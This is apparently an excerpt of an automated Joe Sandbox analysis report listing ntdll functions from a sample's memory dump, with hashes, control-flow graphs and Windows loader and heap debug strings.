                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9af936c68d7ed8db98007d0c15e679c87db12c88de302ac66fa42f89c32186e
                                                                                      • Instruction ID: 2f03d3f9fb92166bace7230465fa874cdcdebd669d08c8c66ec857ff4004db72
                                                                                      • Opcode Fuzzy Hash: d9af936c68d7ed8db98007d0c15e679c87db12c88de302ac66fa42f89c32186e
                                                                                      • Instruction Fuzzy Hash: 0290026120144403D58065588914607009547D030AF91D856A2054515ECE399C597136
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35552ED0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 288ab322797ca6b5ebeebc9cbcaed1b9392919336292e7b557f4fae28c8dab87
                                                                                      • Instruction ID: 20d9b76e09f8cd414e94a98107400fab5a3f68a5d741990330f7a303b74da872
                                                                                      • Opcode Fuzzy Hash: 288ab322797ca6b5ebeebc9cbcaed1b9392919336292e7b557f4fae28c8dab87
                                                                                      • Instruction Fuzzy Hash: 939002216010404245807168C95490640956BE1219B91D966A0988510DC969986D6666
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35552EC0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4ff9ba3ef995adda8155b5bcd221142c354e8a5f8ac628e0776ffcad306941e
                                                                                      • Instruction ID: 47867882c40c6a5d20b7bd0cd02d726fd18221649a1b6e5a96f29331b2446b3b
                                                                                      • Opcode Fuzzy Hash: b4ff9ba3ef995adda8155b5bcd221142c354e8a5f8ac628e0776ffcad306941e
                                                                                      • Instruction Fuzzy Hash: 8690023120144402D54061588918747009547D030AF91D856A5154515ECA75D8997532
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355EA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 429 355ea1f0-355ea269 call 35522330 * 2 RtlDebugPrintTimes 435 355ea41f-355ea444 call 355224d0 * 2 call 35554b50 429->435 436 355ea26f-355ea27a 429->436 438 355ea27c-355ea289 436->438 439 355ea2a4 436->439 441 355ea28f-355ea295 438->441 442 355ea28b-355ea28d 438->442 443 355ea2a8-355ea2b4 439->443 445 355ea29b-355ea2a2 441->445 446 355ea373-355ea375 441->446 442->441 447 355ea2c1-355ea2c3 443->447 445->443 449 355ea39f-355ea3a1 446->449 450 355ea2b6-355ea2bc 447->450 451 355ea2c5-355ea2c7 447->451 452 355ea3a7-355ea3b4 449->452 453 355ea2d5-355ea2fd RtlDebugPrintTimes 449->453 455 355ea2be 450->455 456 355ea2cc-355ea2d0 450->456 451->449 458 355ea3da-355ea3e6 452->458 459 355ea3b6-355ea3c3 452->459 453->435 467 355ea303-355ea320 RtlDebugPrintTimes 453->467 455->447 457 355ea3ec-355ea3ee 456->457 457->449 464 355ea3fb-355ea3fd 458->464 462 355ea3cb-355ea3d1 459->462 463 355ea3c5-355ea3c9 459->463 468 355ea4eb-355ea4ed 462->468 469 355ea3d7 462->469 463->462 465 355ea3ff-355ea401 464->465 466 355ea3f0-355ea3f6 464->466 470 355ea403-355ea409 465->470 471 355ea3f8 466->471 472 355ea447-355ea44b 466->472 467->435 477 355ea326-355ea34c RtlDebugPrintTimes 467->477 468->470 469->458 473 355ea40b-355ea41d RtlDebugPrintTimes 470->473 474 355ea450-355ea474 RtlDebugPrintTimes 470->474 471->464 476 355ea51f-355ea521 472->476 473->435 474->435 480 355ea476-355ea493 RtlDebugPrintTimes 474->480 477->435 482 355ea352-355ea354 477->482 480->435 487 355ea495-355ea4c4 RtlDebugPrintTimes 480->487 484 355ea356-355ea363 482->484 485 355ea377-355ea38a 482->485 488 355ea36b-355ea371 484->488 489 355ea365-355ea369 484->489 486 355ea397-355ea399 485->486 490 355ea38c-355ea392 486->490 491 355ea39b-355ea39d 486->491 487->435 495 355ea4ca-355ea4cc 487->495 488->446 488->485 489->488 492 355ea3e8-355ea3ea 490->492 493 355ea394 490->493 491->449 492->457 493->486 496 355ea4ce-355ea4db 495->496 497 355ea4f2-355ea505 495->497 498 355ea4dd-355ea4e1 496->498 499 355ea4e3-355ea4e9 496->499 500 355ea512-355ea514 497->500 498->499 499->468 499->497 501 355ea516 500->501 502 355ea507-355ea50d 500->502 501->465 503 355ea50f 502->503 504 355ea51b-355ea51d 502->504 503->500 504->476
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122
                                                                                      • Opcode ID: 94e8af1b980d34999b4851e2a4a52b9afd91f6e1eeb3edb68d4b5a85f3f8f343
                                                                                      • Instruction ID: 28f06e4ce953f96300d900bb121c5c7db2bf02535a6cf4caae8bf2c8fc4afede
                                                                                      • Opcode Fuzzy Hash: 94e8af1b980d34999b4851e2a4a52b9afd91f6e1eeb3edb68d4b5a85f3f8f343
                                                                                      • Instruction Fuzzy Hash: 90A19A76A183118FD705CE28C898A9AB7E6FF88350F14496DED46DB350EB70EC46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 986 3552a170-3552a18f 987 3552a195-3552a1b1 986->987 988 3552a4ad-3552a4b4 986->988 990 355777f3-355777f8 987->990 991 3552a1b7-3552a1c0 987->991 988->987 989 3552a4ba-355777c8 988->989 989->987 996 355777ce-355777d3 989->996 991->990 993 3552a1c6-3552a1cc 991->993 994 3552a1d2-3552a1d4 993->994 995 3552a5da-3552a5dc 993->995 994->990 997 3552a1da-3552a1dd 994->997 995->997 998 3552a5e2 995->998 999 3552a393-3552a399 996->999 997->990 1000 3552a1e3-3552a1e6 997->1000 998->1000 1001 3552a1fa-3552a1fd 1000->1001 1002 3552a1e8-3552a1f1 1000->1002 1005 3552a203-3552a24b 1001->1005 1006 3552a5e7-3552a5f0 1001->1006 1003 3552a1f7 1002->1003 1004 355777d8-355777e2 1002->1004 1003->1001 1007 355777e7-355777f0 call 3559ef10 1004->1007 1008 3552a250-3552a255 1005->1008 1006->1005 1009 3552a5f6-3557780c 1006->1009 1007->990 1011 3552a25b-3552a263 1008->1011 1012 3552a39c-3552a39f 1008->1012 1009->1007 1015 3552a265-3552a269 1011->1015 1016 3552a26f-3552a27d 1011->1016 1012->1016 1017 3552a3a5-3552a3a8 1012->1017 1015->1016 1018 3552a4bf-3552a4c8 1015->1018 1019 3552a283-3552a288 1016->1019 1020 3552a3ae-3552a3be 1016->1020 1017->1020 1021 35577823-35577826 1017->1021 1022 3552a4e0-3552a4e3 1018->1022 1023 3552a4ca-3552a4cc 1018->1023 1024 3552a28c-3552a28e 1019->1024 1020->1021 1026 3552a3c4-3552a3cd 1020->1026 1021->1024 1025 3557782c-35577831 1021->1025 1028 3557780e 1022->1028 1029 3552a4e9-3552a4ec 1022->1029 1023->1016 1027 3552a4d2-3552a4db 1023->1027 1030 35577833 1024->1030 1031 3552a294-3552a2ac call 3552a600 1024->1031 1032 35577838 1025->1032 1026->1024 1027->1024 1034 35577819 1028->1034 1033 3552a4f2-3552a4f5 1029->1033 1029->1034 1030->1032 1039 3552a3d2-3552a3d9 1031->1039 1040 3552a2b2-3552a2da 1031->1040 1036 3557783a-3557783c 1032->1036 1033->1023 1034->1021 1036->999 1038 35577842 1036->1038 1041 3552a2dc-3552a2de 1039->1041 1042 3552a3df-3552a3e2 1039->1042 1040->1041 1041->1036 1044 3552a2e4-3552a2eb 1041->1044 1042->1041 1043 3552a3e8-3552a3f3 1042->1043 1043->1008 1045 3552a2f1-3552a2f4 1044->1045 1046 355778ed 1044->1046 1048 3552a300-3552a30a 1045->1048 1047 355778f1-35577909 call 3559ef10 1046->1047 1047->999 1048->1047 1050 3552a310-3552a32c call 3552a760 1048->1050 1054 3552a332-3552a337 1050->1054 1055 3552a4f7-3552a500 1050->1055 1054->999 1056 3552a339-3552a35d 1054->1056 1057 3552a502-3552a50b 1055->1057 1058 3552a521-3552a523 1055->1058 1059 3552a360-3552a363 1056->1059 1057->1058 1060 3552a50d-3552a511 1057->1060 1061 3552a525-3552a543 call 35514428 1058->1061 1062 3552a549-3552a551 1058->1062 1063 3552a3f8-3552a3fc 1059->1063 1064 3552a369-3552a36c 1059->1064 1065 3552a5a1-3552a5cb RtlDebugPrintTimes 1060->1065 1066 3552a517-3552a51b 1060->1066 1061->999 1061->1062 1068 35577847-3557784f 1063->1068 1069 3552a402-3552a405 1063->1069 1070 3552a372-3552a374 1064->1070 1071 355778e3 1064->1071 1065->1058 1085 3552a5d1-3552a5d5 1065->1085 1066->1058 1066->1065 1073 35577855-35577859 1068->1073 1074 3552a554-3552a56a 1068->1074 1069->1074 1075 3552a40b-3552a40e 1069->1075 1076 3552a440-3552a459 call 3552a600 1070->1076 1077 3552a37a-3552a381 1070->1077 1071->1046 1073->1074 1079 3557785f-35577868 1073->1079 1080 3552a570-3552a579 1074->1080 1081 3552a414-3552a42c 1074->1081 1075->1064 1075->1081 1095 3552a57e-3552a585 1076->1095 1096 3552a45f-3552a487 1076->1096 1083 3552a387-3552a38c 1077->1083 1084 3552a49b-3552a4a2 1077->1084 1086 35577892-35577894 1079->1086 1087 3557786a-3557786d 1079->1087 1080->1070 1081->1064 1088 3552a432-3552a43b 1081->1088 1083->999 1090 3552a38e 1083->1090 1084->1048 1091 3552a4a8 1084->1091 1085->1058 1086->1074 1094 3557789a-355778a3 1086->1094 1092 3557786f-35577879 1087->1092 1093 3557787b-3557787e 1087->1093 1088->1070 1090->999 1091->1046 1099 3557788e 1092->1099 1100 35577880-35577889 1093->1100 1101 3557788b 1093->1101 1094->1070 1097 3552a58b-3552a58e 1095->1097 1098 3552a489-3552a48b 1095->1098 1096->1098 1097->1098 1102 3552a594-3552a59c 1097->1102 1098->1083 1103 3552a491-3552a493 1098->1103 1099->1086 1100->1094 1101->1099 1102->1059 1104 3552a499 1103->1104 1105 355778a8-355778b1 1103->1105 1104->1084 1105->1104 1106 355778b7-355778bd 1105->1106 1106->1104 1107 355778c3-355778cb 1106->1107 1107->1104 1108 355778d1-355778dc 1107->1108 1108->1107 1109 355778de 1108->1109 1109->1104
                                                                                      Strings
                                                                                      • Actx , xrefs: 35577819, 35577880
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 355777E2
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 355778F3
                                                                                      • SsHd, xrefs: 3552A304
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35577807
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 355777DD, 35577802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      • Opcode ID: b042c35f949521b2860178fbdfc2237c754095d4e7fa89ae8aa429fbe9baf78c
                                                                                      • Instruction ID: 7391aa7a5ae664b76225ec7f89b6cde228de31279da0e174979351b59ca008a9
                                                                                      • Opcode Fuzzy Hash: b042c35f949521b2860178fbdfc2237c754095d4e7fa89ae8aa429fbe9baf78c
                                                                                      • Instruction Fuzzy Hash: 6BE1BF746083028FE715CE64C894B5AB7E2BF85364F504A2DEC66CB2D0DBB1F885CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1110 3552d690-3552d6cb 1111 3552d6d1-3552d6db 1110->1111 1112 3552d907-3552d90e 1110->1112 1114 35579164 1111->1114 1115 3552d6e1-3552d6ea 1111->1115 1112->1111 1113 3552d914-35579139 1112->1113 1113->1111 1121 3557913f-35579144 1113->1121 1118 3557916e-3557917d 1114->1118 1115->1114 1117 3552d6f0-3552d6f3 1115->1117 1119 3552d8fa-3552d8fc 1117->1119 1120 3552d6f9-3552d6fb 1117->1120 1125 35579158-35579161 call 3559ef10 1118->1125 1123 3552d902 1119->1123 1124 3552d701-3552d704 1119->1124 1120->1114 1120->1124 1122 3552d847-3552d858 call 35554b50 1121->1122 1128 3552d70a-3552d70d 1123->1128 1124->1114 1124->1128 1125->1114 1129 3552d713-3552d716 1128->1129 1130 3552d919-3552d922 1128->1130 1133 3552d71c-3552d768 call 3552d580 1129->1133 1134 3552d92d-3552d936 1129->1134 1130->1129 1135 3552d928-35579153 1130->1135 1133->1122 1140 3552d76e-3552d772 1133->1140 1134->1133 1138 3552d93c 1134->1138 1135->1125 1138->1118 1140->1122 1141 3552d778-3552d77f 1140->1141 1142 3552d8f1-3552d8f5 1141->1142 1143 3552d785-3552d789 1141->1143 1144 35579370-35579388 call 3559ef10 1142->1144 1145 3552d790-3552d79a 1143->1145 1144->1122 1145->1144 1146 3552d7a0-3552d7a7 1145->1146 1148 3552d7a9-3552d7ad 1146->1148 1149 3552d80d-3552d82d 1146->1149 1152 3552d7b3-3552d7b8 1148->1152 1153 3557917f 1148->1153 1151 3552d830-3552d833 1149->1151 1154 3552d835-3552d838 1151->1154 1155 3552d85b-3552d860 1151->1155 1156 35579186-35579188 1152->1156 1157 3552d7be-3552d7c5 1152->1157 1153->1156 1158 35579366-3557936b 1154->1158 1159 3552d83e-3552d840 1154->1159 1160 3552d866-3552d869 1155->1160 1161 355792e0-355792e8 1155->1161 1156->1157 1162 3557918e-355791b7 1156->1162 1163 355791f7-355791fa 1157->1163 1164 3552d7cb-3552d803 call 35558170 1157->1164 1158->1122 1166 3552d842 1159->1166 1167 3552d891-3552d8ac call 3552a600 1159->1167 1168 3552d941-3552d94f 1160->1168 1169 3552d86f-3552d872 1160->1169 1161->1168 1170 355792ee-355792f2 1161->1170 1162->1149 1171 355791bd-355791d7 call 35568050 1162->1171 1165 355791fe-3557920d call 35568050 1163->1165 1186 3552d805-3552d807 1164->1186 1191 35579224 1165->1191 1192 3557920f-3557921d 1165->1192 1166->1122 1187 3552d8b2-3552d8da 1167->1187 1188 35579335-3557933a 1167->1188 1174 3552d874-3552d884 1168->1174 1177 3552d955-3552d95e 1168->1177 1169->1154 1169->1174 1170->1168 1175 355792f8-35579301 1170->1175 1171->1186 1195 355791dd-355791f0 1171->1195 1174->1154 1181 3552d886-3552d88f 1174->1181 1182 35579303-35579306 1175->1182 1183 3557931f-35579321 1175->1183 1177->1159 1181->1159 1193 35579310-35579313 1182->1193 1194 35579308-3557930e 1182->1194 1183->1168 1190 35579327-35579330 1183->1190 1186->1149 1189 3557922d-35579231 1186->1189 1196 3552d8dc-3552d8de 1187->1196 1188->1196 1197 35579340-35579343 1188->1197 1189->1149 1199 35579237-3557923d 1189->1199 1190->1159 1191->1189 1192->1165 1198 3557921f 1192->1198 1200 35579315-3557931a 1193->1200 1201 3557931c 1193->1201 1194->1183 1195->1171 1202 355791f2 1195->1202 1203 35579356-3557935b 1196->1203 1204 3552d8e4-3552d8eb 1196->1204 1197->1196 1205 35579349-35579351 1197->1205 1198->1149 1206 35579264-3557926d 1199->1206 1207 3557923f-3557925c 1199->1207 1200->1190 1201->1183 1202->1149 1203->1122 1208 35579361 1203->1208 1204->1142 1204->1145 1205->1151 1210 355792b4-355792b6 1206->1210 1211 3557926f-35579274 1206->1211 1207->1206 1209 3557925e-35579261 1207->1209 1208->1158 1209->1206 1212 355792d9-355792db 1210->1212 1213 355792b8-355792d3 call 35514428 1210->1213 1211->1210 1214 35579276-3557927a 1211->1214 1212->1122 1213->1122 1213->1212 1216 35579282-355792ae RtlDebugPrintTimes 1214->1216 1217 3557927c-35579280 1214->1217 1216->1210 1220 355792b0 1216->1220 1217->1210 1217->1216 1220->1210
                                                                                      APIs
                                                                                      Strings
                                                                                      • Actx , xrefs: 35579315
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35579372
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35579153
                                                                                      • GsHd, xrefs: 3552D794
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35579178
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3557914E, 35579173
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      • Opcode ID: f9203c055f72d44a8690c976a41c96be2a62280f3fd55b354a4ce3ee402793b4
                                                                                      • Instruction ID: a4d0950ddb1159a39402b3175778a58adc7e4bb495ac0ffa9ecf8c8d3f3102a8
                                                                                      • Opcode Fuzzy Hash: f9203c055f72d44a8690c976a41c96be2a62280f3fd55b354a4ce3ee402793b4
                                                                                      • Instruction Fuzzy Hash: 6AE1BF746083428FE700CF64C880B5AB7F5BF88358F454A6DE9968B681D771F846CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35506565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 35569854, 35569895
                                                                                      • LdrpLoadShimEngine, xrefs: 3556984A, 3556988B
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35569843
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35569885
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      • Opcode ID: 62e3a56c8ccfab22016ba0d487eb80d757b7608beae3a2f995c257b5f42fd125
                                                                                      • Instruction ID: 8efb4e6cec113a0cb48d57675e6420dfccccc2547071711660823d2356b761a4
                                                                                      • Opcode Fuzzy Hash: 62e3a56c8ccfab22016ba0d487eb80d757b7608beae3a2f995c257b5f42fd125
                                                                                      • Instruction Fuzzy Hash: 19510376B24398AFDB18DBA8CC54EAD77B2BB80314F450169E441BB295CF70AC41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355BECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 355BEDE3
                                                                                      • ---------------------------------------, xrefs: 355BEDF9
                                                                                      • Entry Heap Size , xrefs: 355BEDED
                                                                                      • HEAP: , xrefs: 355BECDD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                      • API String ID: 3446177414-1102453626
                                                                                      • Opcode ID: 9cf791a8512a159d04d0e888b4f1626ac44a8cd210c4e1e3957ea478a2eebceb
                                                                                      • Instruction ID: 0cf002ed50cd24fdcd586340b8d21570c2a8ad2695337fa3604198a9e2cababf
                                                                                      • Opcode Fuzzy Hash: 9cf791a8512a159d04d0e888b4f1626ac44a8cd210c4e1e3957ea478a2eebceb
                                                                                      • Instruction Fuzzy Hash: 9B417A79A54215EFCB18DF15C48896ABBF6FB49355B2984A9D404AB310DBB2FC42CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553EE48 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 347COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S5
                                                                                      • API String ID: 0-2861399667
                                                                                      • Opcode ID: 3a816a72f7602df78544bf10a9232b57340555e880ca496fd8af0c6a921596ca
                                                                                      • Instruction ID: 30588ca85d06d471a527184bf0b8658d527be5e237c3ef6d393c514356e78f75
                                                                                      • Opcode Fuzzy Hash: 3a816a72f7602df78544bf10a9232b57340555e880ca496fd8af0c6a921596ca
                                                                                      • Instruction Fuzzy Hash: D6E1DDB4E05708DFDB25CFA9D981A9DBBF1BF48300F20496AE45AE7260DB74A941CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35519046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@
                                                                                      • API String ID: 3446177414-1194432280
                                                                                      • Opcode ID: 051f2052c37349f28e5bf8331ad997b2d104af4c6b99d6e4a765267de8e7356c
                                                                                      • Instruction ID: 83fc125171bb70bdd5482058344ed37a45b807c10ea3d6bba940b802081a596c
                                                                                      • Opcode Fuzzy Hash: 051f2052c37349f28e5bf8331ad997b2d104af4c6b99d6e4a765267de8e7356c
                                                                                      • Instruction Fuzzy Hash: DA812BB5D042699BDB21CB54CC40BDEB7B8BF48750F4041EAA91AB7290E7706F85CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35544C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 35583466
                                                                                      • LdrpFindDllActivationContext, xrefs: 35583440, 3558346C
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 3558344A, 35583476
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 35583439
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      • Opcode ID: fe3364d3a98caad87ebe4b48775f61b0a4eccf75b3680277a0f150d5e9a2eada
                                                                                      • Instruction ID: ab22210f0de89ebc9a724358c8e2fcd0220b7d832385b55a8876c1bd041f0188
                                                                                      • Opcode Fuzzy Hash: fe3364d3a98caad87ebe4b48775f61b0a4eccf75b3680277a0f150d5e9a2eada
                                                                                      • Instruction Fuzzy Hash: 80311AF6B84355EFFB11EB08D848F5AB2A5FB41396F4B816AD80567150EBA0BC80C7D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

